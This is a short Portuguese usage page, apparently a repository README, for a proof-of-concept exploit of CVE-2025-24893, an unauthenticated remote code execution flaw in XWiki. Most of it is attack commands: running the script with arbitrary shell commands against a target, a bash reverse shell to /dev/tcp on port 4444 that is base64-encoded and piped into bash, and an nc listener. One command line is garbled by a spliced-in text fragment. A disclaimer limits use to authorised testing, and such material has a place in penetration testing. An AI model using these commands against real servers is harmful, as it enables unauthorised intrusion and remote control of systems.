
Exploit de prova de conceito para CVE-2025-24893 possibilitando execução remota de código não autenticada no XWiki com comandos shell arbitrários e injeção de reverse shell via Python.
Um exploit de prova de conceito (PoC) atualizado para a CVE-2025-24893, uma vulnerabilidade crítica de RCE não autenticada no XWiki. Esta versão melhora a original ao permitir execução arbitrária de comandos shell e injeção limpa de reverse shell.
Por: HexHunter404
Este código é fornecido apenas para fins educacionais e de testes de penetração autorizados.
Não o utilize em sistemas que não lhe pertençam ou para os quais não tenha permissão explícita para testar.
bash -c '<comando>'/xwiki e evita loops de redirecionamentopython3 CVE-2025-24893-PoC.py -u http://<alvo>/xwiki -c "<comando>"
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64
python3 CVE-2025-24893-PoC.py -u [URL] -c "echo [Payload em Base64] | base64 -d | bash"
nc -lvnp 4444
Se bem-sucedido, você receberá um shell.